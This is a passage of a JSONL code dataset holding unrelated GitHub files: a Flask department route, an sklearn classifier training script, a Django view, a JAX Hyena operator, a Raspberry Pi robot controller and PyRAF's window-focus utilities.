letters[len(letters)//2:]])[0])\n if len(group_of_three) == 3:\n errors_part2.append(find_same_item(group_of_three))\n group_of_three = []\n group_of_three.append(letters)\n errors_part2.append(find_same_item(group_of_three))\n \n return calculate_score_part1(errors_part1, priorities), calculate_score_part2(errors_part2, priorities)\n\ndef day3():\n results = solve()\n print(\"Part 1: \", results[0])\n print(\"Part 2: \", results[1])\n\nday3()","repo_name":"natnordmoen/aoc2022","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16380064902","text":"from flask import *\nfrom flask_login import current_user\n\nfrom attendance import db\nfrom attendance.constant.appConstant import *\nfrom attendance.department.forms import AddDepartmentForm\nfrom attendance.models import Department\n\ndetail_department = Blueprint('detail_department', __name__)\n\n\n@detail_department.route('/department-detail', methods=[Constant.POST, Constant.GET])\ndef department_details():\n depart = Department.query.filter_by(company_id=current_user.company_name).all()\n fav_icon = url_for('static', filename='RegisterLogin/images/icons/all_department.png')\n return render_template('department_details.html', depart=depart, fav_icon=fav_icon, title=Constant.DEPARTMENT)\n\n\n@detail_department.route('/delete-department/', methods=[Constant.GET, Constant.POST])\ndef delete_department(id):\n depart = Department.query.filter_by(id=id).first()\n db.session.delete(depart)\n db.session.commit()\n flash(f'{Constant.DELETE_DEPARTMENT}', f'{Constant.SUCCESS_FLASH_MESSAGE}')\n return redirect(url_for('detail_department.department_details'))\n\n\n@detail_department.route('/update-department/', methods=[Constant.GET, Constant.POST])\ndef update_department(id):\n depart = Department.query.filter_by(id=id).first()\n form = AddDepartmentForm()\n if form.validate_on_submit():\n depart.department_name = form.department_name.data\n db.session.commit()\n flash(f'{Constant.UPDATE_DEPARTMENT}', f'{Constant.SUCCESS_FLASH_MESSAGE}')\n return redirect(url_for('detail_department.department_details'))\n form.department_name.data 
= depart.department_name\n fav_icon = url_for('static', filename='RegisterLogin/images/icons/all_department.png')\n return render_template('add_department.html', depart=depart, title=FormTitlesConstant.ALL_DEPARTMENT,\n fav_icon=fav_icon, form=form, span='Update Department')\n","repo_name":"salman036/Employee-Ams","sub_path":"attendance/department_detail/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"71515823183","text":"#!/usr/bin/env python\n\"\"\"Training script of the best model \"\"\"\n\nimport time\nfrom pathlib import Path\n\nimport click\nimport joblib\nfrom sklearn import metrics\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\n\nfrom utils import read_corpus\n\n\n@click.command()\n@click.option('-tf', '--train_file', default=Path('datasets/train.txt'), type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True, path_type=Path), help='Train file to learn from')\n@click.option('-ttf', '--test_file', default=Path('datasets/test.txt'), type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True, path_type=Path), help='Test data file')\n@click.option('-m', '--model_file', default=Path('model/pipeline.pkl'), type=click.Path(file_okay=True, dir_okay=False, writable=True, path_type=Path), help='Save model to file')\ndef main(\n train_file: Path,\n test_file: Path,\n model_file: Path,\n) -> None:\n X_train, y_train = read_corpus(train_file)\n X_test, y_test = read_corpus(test_file)\n\n pipeline = Pipeline([\n ('vec', TfidfVectorizer(ngram_range=(1, 2), stop_words='english', sublinear_tf=True)),\n ('cls', LinearSVC(C=0.5885398838335058, intercept_scaling=0.6329639882756152,\n max_iter=2000, multi_class='crammer_singer', random_state=42,\n tol=0.009741897651227838))\n ])\n\n print('Training...')\n _training_start_time = time.time()\n pipeline.fit(X_train, y_train)\n training_time = time.time() - _training_start_time\n print(f' time spent: {training_time:.2f}s')\n train_f1 = metrics.f1_score(y_train, pipeline.predict(X_train), average='micro')\n print(f' f1-micro train score: {train_f1:.4f}')\n\n print('Validate model...')\n test_predict = pipeline.predict(X_test)\n test_f1 = metrics.f1_score(y_test, test_predict, average='micro')\n test_recall = metrics.recall_score(y_test, test_predict, average='micro')\n test_precision = metrics.precision_score(y_test, test_predict, average='micro')\n test_accuracy = metrics.accuracy_score(y_test, test_predict)\n print(f' f1-micro test score: {test_f1:.4f}')\n print(f' recall-micro test score: {test_recall:.4f}')\n print(f' precision-micro test score: {test_precision:.4f}')\n print(f' accuracy test score: {test_accuracy:.4f}')\n\n if model_file:\n print(f'Saving model to {model_file}...')\n joblib.dump(pipeline, model_file)\n print(' done')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lct-rug-2022/lft-assignment-1","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37786533376","text":"#!/usr/bin/env python\n# -*- vim: expandtab tabstop=4 shiftwidth=4 smarttab autoindent\n\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.http import Http404\n\nfrom ui.models import *\n\n\ndef 
nodelist(request, path=\"\", id=None, attr=\"\"):\n item = MetaClass.data\n root = MetaClass.root\n steps = [x for x in path.split('/') if x]\n try:\n for step in steps:\n root = root._DOMD.children[step]\n except (KeyError, AttributeError):\n raise Http404\n if not (root is MetaClass.root):\n item = get_object_or_404(root, pk=id)\n # build the \"breadcrumbs\" that lead here\n crumbs = []\n brpath, britem, brattr = steps, item, attr\n while brpath:\n crumbs.append((\"/\"+\"/\".join(brpath), britem, brattr))\n brattr = brpath.pop()\n if brpath:\n britem = britem.up\n # the last breadcrumb: the data object.\n crumbs.append((None, None, brattr))\n crumbs = reversed(crumbs)\n # prepare the context\n data = None if not attr else getattr(item, attr)\n if data:\n # HACK\n class tmp(object):\n def __init__(self, data):\n self.data = data\n self._type = data._type\n def __iter__(self):\n for x in self.data:\n yield x\n for x in range(0, 100):\n yield None\n data = tmp(data)\n subpath = '/'.join((path, attr))\n return render_to_response('nodelist.html', {\n 'customer': 'Demo',\n 'provider': 'NextiraOne',\n 'path': path,\n 'subpath': subpath,\n 'parent': item,\n 'parent_meta': root._DOMD,\n 'attr': attr,\n 'data': data,\n 'data_meta': data._type._DOMD,\n 'crumbs': crumbs\n })\n\n","repo_name":"rjrivero/Plantiweb","sub_path":"ui/views/nodelist.py","file_name":"nodelist.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22817041142","text":"import jax\nfrom jax import numpy as jnp\nfrom flax import linen as nn\n\nfrom einops import rearrange\n\n\ndef fftconv(seq, filter, bias):\n \"\"\"Batched convolution of seq and filter using FFT.\n Args:\n seq: Input sequence. (b, l, d)\n filter: Filter to convolve with. (l, d)\n bias: Bias to multiply with seq. (d,)\n \"\"\"\n seq_len = seq.shape[-2]\n\n # Pad sequence and filter to be able to slice result up to seq_len (see below).\n fft_size = 2*seq_len\n filter_f = jnp.fft.rfft(filter, n=fft_size, axis=-2) / fft_size\n seq_f = jnp.fft.rfft(seq, n=fft_size, axis=-2)\n\n # Discard results after seq_len to preserve causality.\n y = jnp.fft.irfft(seq_f * filter_f, n=fft_size, norm='forward', axis=-2)[..., :seq_len, :]\n\n out = y + seq * bias\n\n return out\n\n\nclass ExponentialModulation(nn.Module):\n \"\"\"Exponentially modulate a matrix along its temporal/sequence dimension.\"\"\"\n fast_decay_pct: float = 0.3\n slow_decay_pct: float = 1.5\n target: float = 1e-2\n shift: float = 0.0\n\n @nn.compact\n def __call__(self, t, x):\n \"\"\"Modulate x using time/sequence values in t.\n Args:\n t: time/position values to modulate with. (l, 1) \n x: input. (..., l, d)\n \"\"\"\n in_dim = x.shape[-1]\n max_decay = jnp.log(self.target) / self.fast_decay_pct\n min_decay = jnp.log(self.target) / self.slow_decay_pct\n deltas = jnp.linspace(min_decay, max_decay, in_dim) # (d,)\n\n decay = jnp.exp(-t * jnp.abs(deltas)) # (l, d)\n out = x * (decay + self.shift)\n return out\n\n\nclass HyenaFilter(nn.Module):\n \"\"\"Create implicit filters from positional embeddings.\"\"\"\n mlp_width: int # Width of implicit MLP.\n layers: int # Number of filter layers.\n n_filters: int # Number of filters to create. 
Usually (order-1)*d\n init_freq: float = 1.0 # Frequency to initialize sine activation with.\n\n @nn.compact\n def __call__(self, embeds):\n k = nn.Dense(self.mlp_width, name='filter_in')(embeds)\n\n freq = self.param(\n 'freq',\n lambda rng, init_freq: jnp.full(self.mlp_width, init_freq),\n self.init_freq\n )\n\n k = jnp.sin(freq * k)\n\n for _ in range(self.layers):\n k = nn.Dense(self.mlp_width)(k)\n k = jnp.sin(freq * k)\n \n k = nn.Dense(self.n_filters, use_bias=False, name='filter_out')(k) # (l, (o-1)*d)\n\n return k\n\n\nclass PosEmbeddings(nn.Module):\n \"\"\"Create positional embeddings for a sequence of a certain maximum length.\"\"\"\n max_len: int # Maximum length of the sequence.\n pos_embed_dim: int # Positional embedding dimension.\n\n @nn.compact\n def __call__(self, l):\n t = jnp.linspace(0, 1, self.max_len)[:l, None] # (l, 1)\n\n # Initialization function for positional embeddings.\n def z_init(rng, l, t):\n assert self.pos_embed_dim % 2 == 1, \"Positional embedding dimension must be odd (1 + real + imag).\"\n\n bands = (self.pos_embed_dim - 1) // 2\n t_rescaled = jnp.linspace(0, self.max_len-1, self.max_len)[:l, None] # (l, 1)\n w = 2 * jnp.pi * t_rescaled / l\n \n f = jnp.linspace(1e-4, bands-1, bands)[None] # (1, bands)\n z = jnp.exp(-1j * f * w) # (l, bands)\n z = jnp.concatenate([t, z.real, z.imag], axis=-1) # (l, 1+pos_embed_dim)\n\n return z\n\n z = self.param(\n 'z',\n z_init,\n l, t\n )\n\n return z, t\n\n\nclass HyenaOperator(nn.Module):\n \"\"\"Apply a Hyena operator to a given sequence.\"\"\"\n max_len: int # Maximum sequence length.\n d_model: int # Width of Hyena layer.\n pos_embed_dim: int # Position embedding dimension.\n filter_features: int # Implicit filter dimension.\n num_filter_layers: int # Number of filter creation layers.\n order: int = 2 # Depth of Hyena recurrence.\n init_freq: float = 1.0 # Initial sine activation frequency.\n dropout: float = 0.0 # Dropout rate.\n \n @nn.compact\n def __call__(self, u, train=True):\n # u: (b, l, embed_dim)\n\n l = min(u.shape[-2], self.max_len)\n\n z, t = PosEmbeddings(self.max_len, self.pos_embed_dim)(l) # z: (l, 1+pos_embed_dim), t: (l, 1)\n n_filters = (self.order-1)*self.d_model\n filters = HyenaFilter(self.filter_features, self.num_filter_layers, n_filters, self.init_freq)(z) # (l, (o-1)*d)\n \n filters = rearrange(filters, 'l (o d) -> o l d', o=self.order-1)\n filters = ExponentialModulation()(t, filters)\n\n # number of projections = self.order * x and one v\n n_projs = (self.order+1)*self.d_model\n u = nn.Dense(n_projs)(u) # (b, l, (o+1)*d)\n \n # depthwise 1d conv\n uc = nn.Conv(\n n_projs,\n kernel_size=(3,),\n padding='CAUSAL',\n feature_group_count=n_projs,\n )(u)\n \n *x, v = jnp.split(uc, self.order+1, axis=-1) # o * (b, l, d), (b, l, d)\n\n # learned bias\n bias = self.param(\n 'bias',\n nn.initializers.normal(stddev=1), # stddev=1 to replicate torch init\n (self.order-1, self.d_model)\n )\n\n # Sequential application of pointwise multiplication with projection and convolution with implicit filter.\n for o, k_i in enumerate(filters):\n v = v * x[o]\n v = nn.Dropout(self.dropout)(v, deterministic=not train)\n v = fftconv(v, k_i, bias[o])\n\n y = v * x[-1]\n y = nn.Dropout(self.dropout)(y, deterministic=not train)\n\n y = nn.Dense(self.d_model)(y)\n\n return y","repo_name":"rbflx/hyena_jax","sub_path":"hyena.py","file_name":"hyena.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} 
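A minimal usage sketch for the HyenaOperator module in the record above (added for illustration; the hyperparameters, shapes, and PRNG seed are assumptions, not taken from the repository):

import jax
import jax.numpy as jnp

# Assumed hyperparameters; pos_embed_dim must be odd (1 + real + imag bands).
model = HyenaOperator(max_len=512, d_model=64, pos_embed_dim=33,
                      filter_features=64, num_filter_layers=4)
x = jnp.ones((2, 128, 64))  # (batch, seq_len, embed_dim)
# train=False keeps the Dropout layers deterministic, so no dropout RNG is needed.
variables = model.init(jax.random.PRNGKey(0), x, train=False)
y = model.apply(variables, x, train=False)  # y.shape == (2, 128, 64)

Note that apply() recomputes the implicit filter from the positional embeddings on every call rather than storing one weight per position; that is the point of the implicit-filter design.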
+{"seq_id":"28709004572","text":"import RPi.GPIO as GPIO\nfrom distance_monitor import *\nimport led_controller\nimport thread\n\n#when to turn away from an object that is sensed, in meters\nturn_distance = .5\n# seconds it takes to turn 90 degrees\nninety_deg_turn= .3\n\n\n#left and right motor both have two controls\n#set motors to different pins\nleft1=6\nleft2=13\nright1=19\nright2=26\n\n#set pin output mode\nGPIO.setmode(GPIO.BCM)\n\n#set up pins\nGPIO.setup(left1, GPIO.OUT)\nGPIO.setup(left2, GPIO.OUT)\nGPIO.setup(right1, GPIO.OUT)\nGPIO.setup(right2, GPIO.OUT)\n\n#direction to go forward\ndef goForward():\n GPIO.output(left1, False)\n GPIO.output(left2, True)\n GPIO.output(right1, False)\n GPIO.output(right2, True)\n\n#direction to go backward\ndef goBackward():\n GPIO.output(left1, True)\n GPIO.output(left2, False)\n GPIO.output(right1, True)\n GPIO.output(right2, False)\n\n#direction to turn left\ndef turnLeft():\n GPIO.output(left1, True)\n GPIO.output(left2, False)\n GPIO.output(right1, False)\n GPIO.output(right2, True)\n\n#direction to turn right\ndef turnRight():\n GPIO.output(left1, False)\n GPIO.output(left2, True)\n GPIO.output(right1, True)\n GPIO.output(right2, False)\n\n#direction to stop\ndef stop():\n GPIO.output(left1, False)\n GPIO.output(left2, False)\n GPIO.output(right1, False)\n GPIO.output(right2, False)\n\n#switch variables to not check same directions too much\n\n\n#sends robot to randomly explore, working with the ultrasonic radar to see if it is too close to walls\ndef explore():\n #check if distance is okay to move forward\n\n goBackward()\n\n\n while getBackwardDistance() > turn_distance:\n # if it is move forward and turn green light on\n continue\n\n # if in front there is an obstacle, turn right, check again\n slow_turn(True)\n\n if getBackwardDistance() > turn_distance:\n explore()\n else:\n\n # if to the right is also covered, turn all the way around and check original left\n # if its clear go back to explore\n slow_turn(False)\n slow_turn(False)\n time.sleep(ninety_deg_turn*2)\n if getBackwardDistance() > turn_distance:\n explore()\n else:\n\n slow_turn(False)\n explore()\n\ndef slow_turn(direction):\n i=0\n if direction==True:\n for i in range(5):\n turnRight()\n time.sleep(.05)\n stop()\n else:\n for i in range(5):\n turnLeft()\n time.sleep(.05)\n stop()\n\ndef control_lights():\n while 1:\n time.sleep(.1)\n led_controller.setGreen(False)\n led_controller.setRed(False)\n led_controller.setYellow(False)\n\n d = getForwardDistance()\n if d < turn_distance:\n led_controller.setRed(True)\n elif d < 2*turn_distance:\n led_controller.setYellow(True)\n else:\n led_controller.setGreen(True)\n\ndef start_led_controller():\n thread.start_new_thread( control_lights())\n\n#start_led_controller()\n","repo_name":"stulich/RaspberryPi-Voice-Controller","sub_path":"directions.py","file_name":"directions.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"19003253226","text":"\"\"\"Contains python routines to do special Window manipulations not\npossible in tkinter.\nThese are python stubs that are overloaded by a c version implementations.\nIf the c versions do not exist, then these routines will do nothing\n\n\"\"\"\n\n\nimport struct\nimport sys\nimport os\nimport fcntl\n\n\n# empty placeholder versions for X\ndef getFocalWindowID():\n return None\n\n\ndef drawCursor(WindowID, x, y, w, h):\n pass\n\n\ndef moveCursorTo(WindowID, rx, ry, x, y):\n pass\n\n\ndef 
setFocusTo(WindowID):\n pass\n\n\ndef setBackingStore(WindowID):\n pass\n\n\ndef getPointerPosition(WindowID):\n pass\n\n\ndef getWindowAttributes(WindowID):\n pass\n\n\ndef getParentID(WindowID):\n pass\n\n\ndef getDeepestVisual():\n return 24\n\n\ndef initGraphics():\n pass\n\n\ndef closeGraphics():\n pass\n\n\n# On OSX, a terminal with no display causes us to fail pretty abruptly:\n# \"INIT_Processeses(), could not establish the default connection to the WindowServer.Abort\".\n# Give the user (Mac or other) a way to still run remotely with no display.\nfrom .tools import capable\n_skipDisplay = not capable.OF_GRAPHICS\n\n# Are we on MacOS X ? Windows ?\nWUTIL_ON_MAC = sys.platform == 'darwin'\nWUTIL_ON_WIN = sys.platform.startswith('win')\n\n# WUTIL_USING_X: default to using X on most platforms, tho surely not on windows\nWUTIL_USING_X = not WUTIL_ON_WIN\n\n# More on this for OSX: for now we support both versions (X or Aqua) on OSX\n# Allow environment variable so any user can force their preference.\nif WUTIL_ON_MAC and not _skipDisplay:\n # default to aqua as it is the 98% case now (post v2.1.9), X11 users will need the env. var\n WUTIL_USING_X = 'PYRAF_WUTIL_USING_X' in os.environ\n\n# Experimental new (2012) mode some have requested (OSX mostly) where all\n# graphics windows drawn are popped to the foreground and left there with\n# the focus (focus not placed back onto terminal). Except the splash win.\nGRAPHICS_ALWAYS_ON_TOP = 'PYRAF_GRAPHICS_ALWAYS_ON_TOP' in os.environ\n\n# attempt to override with xutil or aqua versions\n_has_aqutil = 0\n_has_xutil = 0\ntry:\n if WUTIL_USING_X and not _skipDisplay:\n # set an env var before importing xutil (see PyRAF FAQ on this)\n os.environ['XLIB_SKIP_ARGB_VISUALS'] = '1'\n from . import xutil\n # initGraphics = initXGraphics\n xutil.initXGraphics() # call here for lack of a better place for now\n\n # Check to make sure a valid XWindow ID was initialized\n # Attach closeGraphics to XWindow methods\n # ONLY if an XWindow was successfully initialized.\n # WJH (10June2004)\n if xutil.getFocalWindowID() == -1:\n raise OSError()\n\n # Successful initialization. Reset dummy methods with\n # those from 'xutil' now.\n from pyraf.xutil import *\n _has_xutil = 1 # Flag to mark successful initialization of XWindow\n closeGraphics = closeXGraphics\n\n else:\n # Start with a basic empty non-X implementation (e.g. Cygwin?, OSX, ?)\n def getWindowIdZero():\n return 0\n\n getFocalWindowID = getWindowIdZero\n\n # If on OSX w/out X11, use aqutil\n if WUTIL_ON_MAC and not _skipDisplay: # as opposed to the PC (future?)\n try:\n from . 
import aqutil\n # override the few Mac-specific functions needed\n from .aqutil import getFocalWindowID, setFocusTo, getParentID\n from .aqutil import moveCursorTo, getPointerPosition\n _has_aqutil = 1\n except ImportError:\n _has_aqutil = 0\n print(\"Could not import aqutil\")\n\nexcept ImportError:\n _has_xutil = 0 # Unsuccessful init of XWindow\nexcept OSError:\n _has_xutil = 0 # Unsuccessful init of XWindow\n\n# Clean up the namespace a bit...\ntry:\n del xutil\nexcept NameError:\n pass # may not have imported it\n\nimport termios\nmagicConstant = termios.TIOCGWINSZ\n\n\ndef getScreenDepth():\n return getDeepestVisual()\n\n\n# maintain a dictionary of top level IDs to avoid repeated effort here\ntopIDmap = {}\n\n\ndef getTopID(WindowID):\n \"\"\"Find top level window's ID, parent of given window.\n If window is already top (or not implemented), it returns its own ID.\n If the input Id represents the root window then it will just\n return itself\"\"\"\n wid = WindowID\n if wid <= 0:\n return wid\n\n # a \"top ID\" makes less sense if we are not using X\n if not WUTIL_USING_X:\n if _has_aqutil:\n return aqutil.getTopIdFor(wid)\n else:\n return wid # everything is its own top\n\n if wid in topIDmap:\n return topIDmap[wid]\n try:\n oid = wid\n while True:\n pid = getParentID(wid)\n if (not pid) or (pid == wid):\n topIDmap[oid] = wid\n return wid\n else:\n wid = pid\n except OSError:\n return None\n\n\ndef forceFocusToNewWindow():\n \"\"\" This is used to make sure that a window which just popped up is\n actually in the front, where focus would be. With X, any new window\n comes to the front anyway, so this is a no-op. Currently this is\n only necessary under Aqua. \"\"\"\n if _has_aqutil:\n aqutil.focusOnGui()\n\n\ndef isViewable(WindowID):\n\n if not WUTIL_USING_X:\n return 1 # native OSX code still under dev.; make everything viewable\n attrdict = getWindowAttributes(WindowID)\n if attrdict:\n return attrdict['viewable']\n else:\n return 1\n\n\ndef getTermWindowSize():\n \"\"\"return a tuple containing the y,x (rows,cols) size of the terminal window\n in characters\"\"\"\n\n if magicConstant is None:\n raise Exception(\"platform isn't supported: \" + sys.platform)\n\n # define string to serve as memory area to receive copy of structure\n # created by IOCTL call\n tstruct = ' ' * 20 # that should be more than enough memory\n try:\n rstruct = fcntl.ioctl(sys.stdout.fileno(), magicConstant, tstruct)\n ysize, xsize = struct.unpack('hh', rstruct[0:4])\n # handle bug in konsole (and maybe other bad cases)\n if ysize <= 0:\n ysize = 24\n if xsize <= 0:\n xsize = 80\n return ysize, xsize\n except OSError:\n return (24, 80) # assume generic size\n\n\nclass FocusEntity:\n \"\"\"Represents an interface to perform focus manipulations on a variety of\n window objects. This allows the windows to be handled by code that does\n not need to know the specifics of how to set focus to, restore focus\n to, warp the cursor to, etc. Since nothing is implemented, it isn't\n necessary to inherit it, but inheriting it does allow type checks to\n see if an object is a subclass of FocusEntity.\n \"\"\"\n\n def saveCursorPos(self):\n \"\"\"When this method is called, the object should know how to save\n the current position of the cursor in the window. 
If the cursor is\n not in the window or the window does not currently have focus, it\n should do nothing.\"\"\"\n # raise exceptions to ensure implementation of required methods\n raise NotImplementedError(\"class FocusEntity cannot be used directly\")\n\n def forceFocus(self, cursorToo=True):\n \"\"\"When called, the object should force focus to the window it\n represents and warp the cursor to it using the last saved cursor\n position.\"\"\"\n raise NotImplementedError(\"class FocusEntity cannot be used directly\")\n\n def getWindowID(self):\n \"\"\"return a window ID that can be used to find the top window\n of the window hierarchy.\"\"\"\n raise NotImplementedError(\"class FocusEntity cannot be used directly\")\n\n\nclass TerminalFocusEntity(FocusEntity):\n \"\"\"Implementation of FocusEntity interface for the originating\n terminal window\"\"\"\n\n def __init__(self):\n \"\"\"IMPORTANT: This class must be instantiated while focus\n is in the terminal window\"\"\"\n self.lastScreenX = None\n self.lastScreenY = None\n try:\n self.windowID = getFocalWindowID()\n if self.windowID == -1:\n self.windowID = None\n if _has_aqutil:\n scrnPosDict = aqutil.getPointerGlobalPosition()\n self.lastScreenX = scrnPosDict['x']\n self.lastScreenY = scrnPosDict['y']\n except OSError:\n self.windowID = None\n self.lastX = 30\n self.lastY = 30\n\n def getWindowID(self):\n return self.windowID\n\n def forceFocus(self, cursorToo=True):\n if WUTIL_ON_MAC and WUTIL_USING_X:\n return # X ver. under dev. on OSX... (was broken anyway)\n if not (self.windowID and isViewable(self.windowID)):\n # no window or not viewable\n return\n if self.windowID == getFocalWindowID():\n # focus is already here\n return\n if _has_aqutil:\n if self.lastScreenX is not None and cursorToo:\n moveCursorTo(self.windowID, self.lastScreenX, self.lastScreenY,\n 0, 0)\n else: # WUTIL_USING_X\n if self.lastX is not None and cursorToo:\n moveCursorTo(self.windowID, 0, 0, self.lastX, self.lastY)\n if not GRAPHICS_ALWAYS_ON_TOP:\n setFocusTo(self.windowID)\n\n def saveCursorPos(self):\n if (not self.windowID) or (self.windowID != getFocalWindowID()):\n return\n if _has_aqutil:\n scrnPosDict = aqutil.getPointerGlobalPosition()\n self.lastScreenX = scrnPosDict['x']\n self.lastScreenY = scrnPosDict['y']\n return\n if not WUTIL_USING_X:\n return # some of the following xutil methods are undefined\n\n # This also won't work on a Mac if running from the Terminal app\n # but it WILL work on a Mac from an X11 xterm window\n if WUTIL_USING_X and WUTIL_ON_MAC and self.windowID < 2:\n return\n\n posdict = getPointerPosition(self.windowID)\n if posdict:\n x = posdict['win_x']\n y = posdict['win_y']\n else:\n return\n windict = getWindowAttributes(self.windowID)\n if windict and windict['width'] > 0:\n maxX = windict['width']\n maxY = windict['height']\n else:\n return\n # do nothing if position out of window\n if x < 0 or y < 0 or x >= maxX or y >= maxY:\n return\n self.lastX = x\n self.lastY = y\n\n # some extra utility methods\n\n def updateWindowID(self, id=None):\n \"\"\"Update terminal window ID (to current window if id is not given)\"\"\"\n if id is None:\n id = getFocalWindowID()\n self.windowID = id\n\n def getWindowSize(self):\n \"\"\"return a tuple containing the x,y size of the terminal window\n in characters\"\"\"\n\n # define string to serve as memory area to receive copy of structure\n # created by IOCTL call\n tstruct = ' ' * 20 # that should be more than enough memory\n # xxx exception handling needed (but what exception to catch?)\n        
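# (added note, not in the original) TIOCGWINSZ fills a struct winsize of four shorts\n        # (rows, cols, xpixel, ypixel); only the first two shorts are unpacked below, and the\n        # kernel order is (rows, cols)\n        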
rstruct = fcntl.ioctl(sys.stdout.fileno(), magicConstant, tstruct)\n xsize, ysize = struct.unpack('hh', rstruct[0:4])\n return xsize, ysize\n\n\nclass FocusController:\n \"\"\"A mediator that allows different components to give responsibility\n to this class for deciding how to manipulate focus. It is this class\n that knows what elements are available and where focus should be returned\n to when asked to restore the previous focus and cursor position. The\n details of doing it for different windows are encapsulated in descendants\n of the FocusEntity objects that it contains. Since this is properly\n a singleton, it is created by the wutil module itself and accessed\n as an object of wutil\"\"\"\n\n def __init__(self, termwindow):\n self.focusEntities = {'terminal': termwindow}\n self.focusStack = [termwindow]\n self.hasGraphics = termwindow.getWindowID() is not None\n\n def addFocusEntity(self, name, focusEntity):\n if name == 'terminal':\n return # ignore any attempts to change terminal entity\n if name in self.focusEntities:\n return # ignore for now, not sure what proper behavior is\n self.focusEntities[name] = focusEntity\n\n def removeFocusEntity(self, focusEntityName):\n\n if focusEntityName in self.focusEntities:\n entity = self.focusEntities[focusEntityName]\n del self.focusEntities[focusEntityName]\n try:\n while True:\n self.focusStack.remove(entity)\n except ValueError:\n pass\n\n def restoreLast(self):\n\n if not self.hasGraphics:\n return\n if len(self.focusStack) > 1:\n # update current position if we're in the correct window\n current = self.focusStack.pop()\n if current.getWindowID() == getFocalWindowID():\n current.saveCursorPos()\n if self.focusInFamily():\n self.focusStack[-1].forceFocus()\n\n def setCurrent(self, force=0):\n \"\"\"This is to be used in cases where focus has been lost to\n a window not part of this scheme (dialog boxes for example)\n and it is desired to return focus to the entity currently considered\n active.\"\"\"\n if self.hasGraphics and (force or self.focusInFamily()):\n self.focusStack[-1].forceFocus()\n\n def resetFocusHistory(self):\n # self.focusStack = [self.focusEntities['terminal']]\n last = self.focusStack[-1]\n self.focusStack = self.focusStack[:1]\n if last != self.focusStack[-1]:\n self.setCurrent()\n\n def getCurrentFocusEntity(self):\n \"\"\"Return the focus entity that currently has focus.\n Return None if focus is not in the focus family\"\"\"\n if not self.hasGraphics:\n return None, None\n currentFocusWinID = getFocalWindowID()\n currentTopID = getTopID(currentFocusWinID)\n for name, focusEntity in self.focusEntities.items():\n if getTopID(focusEntity.getWindowID()) == currentTopID:\n return name, focusEntity\n else:\n return None, None\n\n def saveCursorPos(self):\n\n if self.hasGraphics:\n name, focusEntity = self.getCurrentFocusEntity()\n if focusEntity:\n focusEntity.saveCursorPos()\n\n def setFocusTo(self, focusTarget, always=0):\n \"\"\"focusTarget can be a string or a FocusEntity. 
It is possible to\n give a FocusEntity that is not in focusEntities (so it isn't\n considered part of the focus family, but is part of the restore\n chain.)\n\n If always is true, target is added to stack even if it is already\n the focus (useful for pairs of setFocusTo/restoreLast calls.)\n \"\"\"\n if (focusTarget is None) or (not self.hasGraphics):\n return\n if not WUTIL_USING_X:\n if hasattr(focusTarget, 'gwidget'): # gwidget is a Canvas\n focusTarget.gwidget.focus_set()\n\n current = self.focusStack[-1]\n if isinstance(focusTarget, str):\n next = self.focusEntities[focusTarget]\n else:\n next = focusTarget\n # only append if focus stack last entry different from new\n if next != self.focusStack[-1] or always:\n self.focusStack.append(next)\n if self.focusInFamily():\n current.saveCursorPos()\n next.forceFocus()\n\n def getFocusEntity(self, FEName):\n \"\"\"See if named Focus Entity is currently registered. Return it\n if it exists, None otherwise\"\"\"\n\n return self.focusEntities.get(FEName)\n\n def focusInFamily(self):\n \"\"\"Determine if current focus is within the pyraf family\n (as defined by self.focusEntities)\"\"\"\n if not self.hasGraphics:\n return 0\n currentFocusWinID = getFocalWindowID()\n currentTopID = getTopID(currentFocusWinID)\n for focusEntity in self.focusEntities.values():\n fwid = focusEntity.getWindowID()\n if fwid:\n if getTopID(fwid) == currentTopID:\n return 1\n return 0 # not in family\n\n def getCurrentMark(self):\n \"\"\"Returns mark that can be used to restore focus to current setting\"\"\"\n return len(self.focusStack)\n\n def restoreToMark(self, mark):\n \"\"\"Restore focus to value at mark\"\"\"\n last = self.focusStack[-1]\n self.focusStack = self.focusStack[:mark]\n if last != self.focusStack[-1]:\n self.setCurrent()\n\n\nterminal = TerminalFocusEntity()\nfocusController = FocusController(terminal)\n\n\n# debug helper\ndef dumpspecs(outstream=None, skip_volatiles=False):\n \"\"\" Dump various flags, settings, values to the terminal. This is not to\n be used internal to this module - it must wait until the module is fully\n imported for all the values to be finalized. If outstream is not given,\n this will simply dump to sys.stdout. 
